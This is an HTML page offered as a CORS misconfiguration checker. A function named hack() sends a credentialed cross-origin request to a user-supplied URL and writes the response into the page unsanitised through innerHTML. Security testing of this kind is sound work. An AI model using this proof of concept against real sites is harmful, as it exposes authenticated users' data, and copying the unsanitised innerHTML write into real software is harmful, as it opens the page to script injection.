<!DOCTYPE html>
<html>
<style>
input[type=text] {
    width: 100%;
    padding: 12px 20px;
    margin: 8px 0;
    box-sizing: border-box;
    border: none;
    background-color: #3CBC8D;
    color: black;
	font-size:20px;
}

input[type=submit] {
    width: 100%;
    background-color: #4CAF50;
    color: black;
	font-size: 25px;
    padding: 14px 20px;
    margin: 8px 0;
    border: none;
    border-radius: 4px;
    cursor: pointer;
}

input[type=submit]:hover {
    background-color: #45a049;
	
}

div {
    border-radius: 5px;
    background-color: #f2f2f2;
    padding: 20px;
}
</style>
<body style="background-color:#898E8C">
<center>
<h3 style="color:black">This Form is made to Just check The CORS Type Vulnerability. Just Type the url in the box and see the Details of vulnerable site on our domain.(:</h3>
</center>
<div>
  <form id="myForm" >
    
    <input type="text" id="fname" name="firstname" required="" placeholder="Please Enter the url here">

    
  
    <input onclick="check(); return false"  type="submit" value="Click Me">
  </form>
</div>













<script>
var olx;
function check(){
var x = document.getElementById("myForm").elements[0].value;
	
	
  // document.getElementById("demo").innerHTML = x; 
olx=x;   
hack();
}
</script>




<script>
      function hack() {
      var xhttp = new XMLHttpRequest();
      xhttp.onreadystatechange = function() {
      if (this.readyState == 4 && this.status == 200) {
     // document.getElementById("demo").innerHTML = btoa(unescape(encodeURIComponent(this.responseText)));
	  // document.write(btoa(this.responseText));
	document.getElementById("demo1").innerHTML = this.responseText;
      } 
      };
     xhttp.open("GET", olx, true);
	
     xhttp.withCredentials = true;
     xhttp.send(); 
     }
	// hack();
</script>

<center>
<h2>CORS Details Here: </h2>  


<div id="demo1" style="font-size:20px;">
</div>
</center>

</body>
</html>
